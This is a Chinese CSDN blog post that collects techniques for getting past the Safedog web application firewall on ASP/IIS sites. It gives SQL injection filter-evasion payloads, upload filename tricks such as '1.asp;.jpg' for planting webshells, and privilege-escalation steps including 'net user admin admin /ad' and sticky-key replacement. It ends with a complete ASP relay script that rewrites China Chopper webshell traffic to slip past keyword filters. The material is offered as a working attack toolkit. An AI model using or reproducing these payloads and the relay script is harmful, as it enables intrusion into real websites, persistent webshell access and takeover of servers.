突破安全狗的技术总汇 - cracer_CSDN

安全狗,无所谓,反正现在有些突破安全狗的方法A.1. 上传一个 jpg的文件 内容为一句话2. 上传一个 1.asp文件 插入代码 <!- -#include =file = “jpg的文件” - ->然后就可以绕过安全狗解析了

B.还有一种上传1.asp;(1).jpg

建立1.asp;这样的目录 你懂的!!~!!!!

过安全狗建立;1.asp目录

突破安全狗的技术总汇

过安全狗主要过哪几方面: 

1.过注入 

2.过大马被阻拦访问 

3.过菜刀连接一句话被拦截 

4.过1.asp;.jpg这样的文件 

其他我没遇到了。。 

现在一点一点讲: 

1.过注入 

方法一:a.asp?aaa=%00&id=sql语句 

a.asp?aaa=%00.&id=sql

在被过滤的关键词中添加 % (此方法经常奏效,但是工具不支持,必须手动)

方法二: a.asp?id=sql语句 里面把安全过滤的加个%l 比如: un%aion sel%aect 1,2,3,4 fr%aom admin 

上传篇

基本方法: 

文件名拦截突破:

1  / ;1.asp;1.jpg

2  /;1.cer/1.jpg

3  /;1.cer;.jpg/1.jpg

4  正常文件建立,不带;的,截断也好,直接建立也好

5.1;.....asa

b.文件内容过安全狗:

      b.1  各类加密,例如:http://sb.***.net/thread-8616-1-1.html

      b.2  include文件,例如<!--#include file="1.jpg" -->

提权篇

其实对于一些老狗,提权时候可以无视,但是有时候会禁止添加用户,会禁止反向链接(部分远控),这一点360也一样

那么遇到的时候有下面几种方法可以尝试:

a. 获取明文密码(方法不限,或导出hash破解)

b. 替换粘滞键或者放大镜等

c. 用net user admin admin /ad  (ad 不是 add,记得以前360可以这么过)

d. dll劫持

2.过大马被阻拦访问 

方法一:上传一个大马 然后访问http://sss.***.com/dama.asp 访问后出现拦截。 

那么解决方法 先将dama.asp改名dama.jpg上传,然后在同目录上传个文件da.asp 内容为: 这样再访问da.asp 就不会被拦截了。 

3.过菜刀连接一句话被拦截 

方法一:不用菜刀连接一句话,用别的一句话连接端。 

方法二:中转下连接菜刀,把过滤掉的词替换掉。 

4.过1.asp;.jpg这样的文件拦截 

方法一:;1.asp;.jpg 

方法二:保密 

具体就为大家总结这么多了,安全狗 反正基本可以无视了!! 

大家还有什么要补充的可以发在下面! 

下面这个脚本是过安全狗连接菜刀用的 用法: 先把这个脚本放到个可执行.asp的目录 

然后访问http://www.***.com/asf.asp?dz=你要过的那个webshell地址 

然后把地址输入进菜刀 密码还是你要过的那个webshell的密码 类型也是选择那个一句话木马的后缀类型 

例如:http://www.***.com/asf.asp?dz=http://xxx.com/yijuhua.php 密码 

这样输入就菜刀 

这个脚本暂时支持.php .aspx的一句话连接 .asp的可能还不行 没测试过。如果谁有装了安全狗的webshell可以告诉我下。我再测试下把这个脚本修改全面都支持! 

<%

'饶过的原理,抓菜刀连接webshell的包 然后研究安全狗过滤了哪些关键字 中转替换掉那些过滤的关键字 就成!

JmStr=Replace(Request.Form,"$_POST","$_REQUEST")

JmStr=Replace(JmStr,"->|","-->|")

JmStr=Replace(JmStr,"@eval(","@eval (")

JmStr=Replace(JmStr,"System.Convert.FromBase64String","System.Convert. FromBase64String")

JMUrl=request("dz")

response.write request("dz")

JmRef=JMUrl

JmCok=""

'作者: 鬼哥

'菜刀突破安全狗连接!

'www.***.com

response.write PostData(JMUrl,JmStr,JmCok,JmRef) 

Function PostData(PostUrl,PostStr,PostCok,PostRef)

Dim Http

Set Http = Server.CreateObject("msxml2.serverXMLHTTP")

With Http

.Open "POST",PostUrl,False

.SetRequestHeader "Content-Length",Len(PostStr)

.SetRequestHeader "Content-Type","application/x-www-form-urlencoded"

.SetRequestHeader "Referer",PostRef

'.SetRequestHeader "Cookie",PostCok

.Send PostStr

PostData = .ResponseBody

End With

Set Http = Nothing

PostData =bytes2BSTR(PostData)

End Function 

Function bytes2BSTR(vIn)

Dim strReturn

Dim I, ThisCharCode, NextCharCode

strReturn = ""

For I = 1 To LenB(vIn)

ThisCharCode = AscB(MidB(vIn, I, 1))

If ThisCharCode < &H80 Then

strReturn = strReturn & Chr(ThisCharCode)

Else

NextCharCode = AscB(MidB(vIn, I + 1, 1))

strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))

I = I + 1

End If

Next

bytes2BSTR = strReturn

End Function 

Function URLEncoding(vstrin)

strReturn=""

Dim i

For i=1 To Len(vstrin)

ThisChr=Mid(vstrin,i,1)

if Abs(Asc(ThisChr))< &HFF Then

strReturn=strReturn & ThisChr

Else

InnerCode=Asc(ThisChr)

If InnerCode<0 Then

InnerCode=InnerCode + &H10000

End If

Hight1=(InnerCode And &HFF00) \&HFF

Low1=InnerCode And &HFF

strReturn=strReturn & "%" & Hex(Hight1) & "%" & Hex(Low1)

End if

Next

strReturn=Replace(strReturn,chr(32),"%20") '转换空格,如果网站过滤了空格,尝试用/**/来代替%20

strReturn=Replace(strReturn,chr(43),"%2B") 'JMDCW增加转换+字符

'strReturn=Replace(strReturn,过滤字符,"转换为字符") '在此增加要过滤的代码

URLEncoding=strReturn

End Function

%> 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值